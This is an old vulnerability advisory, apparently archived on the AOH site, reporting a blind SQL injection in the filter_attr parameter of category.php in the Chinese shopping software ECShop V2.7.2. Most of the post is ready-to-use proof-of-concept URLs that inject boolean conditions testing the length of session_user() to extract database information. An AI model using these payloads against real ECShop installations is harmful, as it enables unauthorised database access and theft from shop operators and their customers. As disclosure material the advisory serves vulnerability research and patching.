AOH :: HP Unsorted E :: BT-30106.HTM

ECShop apps injection



Injection of ECShop apps.
Injection of ECShop apps.




ECSHOP is one of the most famous shopping apps of china.
 
The last vesion of ECShop is V2.7.2. It has a OR_NUM type injection in filter_attr Parameter of category.php.
 
For example:
 
http://www.example.com/shop/category.php?page=1&sort=goods_id&order=ASC#goods_list&category=1&display=grid&brand=0&price_min=0&price_max=0&filter_attr=-999 
 
 
 

Test it :
 
http://www.example.com/shop/category.php?page=1&sort=goods_id&order=ASC%23goods_list&category=1&display=grid&brand=0&price_min=0&price_max=0&filter_attr=-999%20OR%20length(session_user())=14%20or%201=2 
 
http://www.example.com/shop/category.php?page=1&sort=goods_id&order=ASC%23goods_list&category=1&display=grid&brand=0&price_min=0&price_max=0&filter_attr=-999%20OR%20length(session_user())=15%20or%201=2 
 
 
 
 
Liscker
2010.05.07 		 	   		  

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.